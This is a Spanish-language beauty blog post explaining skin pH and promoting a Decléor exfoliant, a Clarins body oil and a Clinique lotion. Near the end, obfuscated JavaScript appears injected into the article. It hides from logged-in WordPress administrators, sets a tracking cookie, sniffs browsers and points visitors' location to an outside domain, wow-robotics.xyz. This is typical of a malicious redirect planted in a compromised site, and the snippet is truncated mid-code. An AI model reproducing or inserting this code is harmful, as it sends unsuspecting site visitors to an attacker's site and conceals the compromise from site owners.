Muchas veces, cuando usamos un champú o un gel para el cuerpo, nos dejamos llevar por un olor agradable. Sin embargo, no hay que descuidar chequear los niveles de alcohol o perfume que contiene, ya que son los causantes en muchas ocasiones de producir sensibilidad o sequedad en nuestra piel. Por eso, es importante conservar la capa ácida de nuestra piel utilizando los productos adecuados, solo así la protegeremos desde lo más profundo. ¿Quieres saber cómo cuidar tu piel y conservar su pH natural?

 

cuidarlapiel

 

¿Qué es el pH de la piel?

 La piel tiene unos niveles de pH ligeramente ácidos, que suelen oscilar entre 4.0 y 4.5. Cuando estos niveles se ven alterados, solemos ver pequeñas irritaciones, piel seca, rojeces y mucha sensibilidad. No importa la zona del cuerpo, todas pueden sufrir alguna alteración si el pH se ve modificado. En este sentido, es clave echar un vistazo a nuestros geles, cremas hidratantes, leches limpiadoras y maquillaje que estamos usando a diario, para comprobar si son los causantes de esa alteración en nuestro pH.

Para mantener los niveles de pH adecuados, es importante también tener la dermis limpia, pero ¡cuidado porque aquí solemos cometer algunos errores! Es frecuente usar productos limpiadores que no son los más aptos para nuestra piel porque la irritan. Gommage 1000 Grains Corps de Decléor es un exfoliante gourmet de pomelo que se presenta en una agradable textura de aceite y leche, muy apta para casi todo tipo de pieles. A la hora de aplicarlo, no debes frotar bruscamente el gel sobre el cuerpo, sino que deberás realizar pequeños movimientos que te permitan retirar con suavidad las células muertas. La sensación de bienestar la notarás al momento.

comocuidarlapiel

Otro de los productos que no deben faltar en tu rutina es Huile Tonic de Clarins, un aceite corporal formado por extractos de plantas, como el romero, el geranio o la menta. Aplicárselo en la piel es un manjar para los sentidos, ya que reafirma, tonifica y mejora la elasticidad. En cuanto lo uses, notarás cómo tu piel vuelve a estar hidratada y notarás cómo recupera la elasticidad. Además, su aroma te enamorará.

como_cuidar_la_piel

¿Usas una crema hidratante adecuada?

Puede que tu crema hidratante te enamore por su textura, o por su aroma… pero ¡no caigas en la trampa! Y si notas que tienes la piel últimamente más sensible, comprueba los ingredientes y si tiene alcohol. Solo así, conseguirás conservar y proteger tu piel sana y en buen estado. Una buena alternativa es la Loción Hidratante Corporal Deep Comfort de Clinique, que tiene una textura ligera y sedosa. Notarás cómo tu piel se va calmando poco a poco y se va restableciendo. Está especialmente indicada para aquellas dermis sensibles y frágiles, que incluso se han ido descamando. La puedes usar durante todo el año, pero ahora que se acerca la primavera, notarás un especial bienestar en todo tu cuerpo tras su aplicación.

 

¿Tienes la piel sensible y no sabes cómo restablecer su pH? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone